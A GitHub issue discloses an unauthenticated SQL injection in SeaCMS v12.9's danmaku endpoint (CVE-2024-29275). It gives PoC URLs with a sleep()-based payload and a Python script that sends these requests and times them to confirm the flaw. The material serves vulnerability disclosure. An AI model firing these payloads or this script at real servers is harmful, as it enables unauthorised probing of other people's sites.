
Unauthenticated SQL Injection in SeaCMS v12.9

Open · Hebing123 opened this issue 1 year ago · 1 comment

Summary

SeaCMS v12.9 suffers from an unauthenticated SQL injection vulnerability in the dmku/index.php file where user-supplied data is used directly in an SQL query without proper sanitization.

Detail

The following code demonstrates the misuse of the id parameter: https://github.com/HuaQiPro/seacms/blob/ffa00178c7bf966b6bed7109ca76c270eadfeb70/js/player/dmplayer/dmku/class/mysqli.class.php#L287-L305

It is clearly spliced directly into the SQL statement without filtering.

Proof of Concept (PoC)

http(s)://ip:port//js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(10)))v)&type=list

http(s)://ip:port//js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(15)))v)&type=list

Impact

This vulnerability allows unauthenticated remote attackers to inject arbitrary SQL commands through the id parameter.

Hebing123 · Mar 12 '24 07:03
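The PoC above relies on a time-based blind check: the injected subquery calls MySQL sleep() and the response is expected to stall by the requested number of seconds. A single slow response is weak evidence on its own (network jitter or a loaded server can produce the same delay), so the practical confirmation is to send the same payload with several different sleep values and check that the delay tracks the value. The script below is an added example and is not part of the report or of SeaCMS; it builds the exact query string shown in the PoC (ac=del, type=list, and the sleep() subquery in the unquoted numeric id), measures elapsed time per request, and only reports the parameter as injectable when every increase in the sleep value produces a matching increase in response time. The base URL and the two simulated transports (one that behaves like a vulnerable server, one like a patched one) are constructed for offline use; the real transport uses urllib.

```python
import re
import time
import urllib.parse
import urllib.request

# Payload shape taken from the PoC in the report: a derived-table subquery
# wrapping MySQL sleep(), placed in the unquoted numeric `id` parameter.
def build_poc_url(base, seconds):
    # `base` is assumed to look like "http://ip:port/js/player/dmplayer/dmku/"
    query = urllib.parse.urlencode({
        "ac": "del",
        "id": f"(select(0)from(select(sleep({seconds})))v)",
        "type": "list",
    })
    return f"{base.rstrip('/')}/?{query}"


def http_elapsed(url, timeout=60):
    """Real transport: fetch `url` and return wall-clock seconds spent."""
    start = time.monotonic()
    try:
        urllib.request.urlopen(url, timeout=timeout).read()
    except Exception:
        # An error page is still a valid timing sample for a blind check.
        pass
    return time.monotonic() - start


def confirm_time_based(base, measure=http_elapsed, delays=(0, 5, 10), tolerance=2.0):
    """Return True only if response time rises with the injected sleep() value.

    The delay-0 request is the baseline; each larger delay must add at least
    (delay - tolerance) seconds on top of it. Jitter that happens to slow one
    request will not satisfy every step, so this is much more reliable than
    trusting a single slow response.
    """
    samples = [measure(build_poc_url(base, d)) for d in delays]
    baseline = samples[0]
    for delay, elapsed in zip(delays[1:], samples[1:]):
        if elapsed - baseline < delay - tolerance:
            return False
    return True


# --- constructed transports so the example runs offline ---------------------
def simulated_vulnerable(url):
    """Behaves like an injectable endpoint: delay equals the sleep() argument.
    Returns the would-be elapsed time instead of actually sleeping."""
    params = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)
    match = re.search(r"sleep\((\d+)\)", params["id"][0])
    return 0.1 + int(match.group(1))


def simulated_patched(url):
    """Behaves like a fixed endpoint (e.g. the id bound as an integer):
    response time is constant regardless of the payload."""
    return 0.1


if __name__ == "__main__":
    target = "http://192.0.2.10:8080/js/player/dmplayer/dmku/"  # constructed address
    print("vulnerable simulation:", confirm_time_based(target, measure=simulated_vulnerable))
    print("patched simulation:   ", confirm_time_based(target, measure=simulated_patched))
    # Against a real host, drop the `measure=` argument to use http_elapsed().
```

Against a real instance the total runtime is the sum of the sleep values (15 s with the defaults), so keep the request timeout above the largest delay or the timeout itself will be mistaken for a stall.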

This is the vulnerability exploitation reference for CVE-2024-29275

Hebing123 · May 10 '24 09:05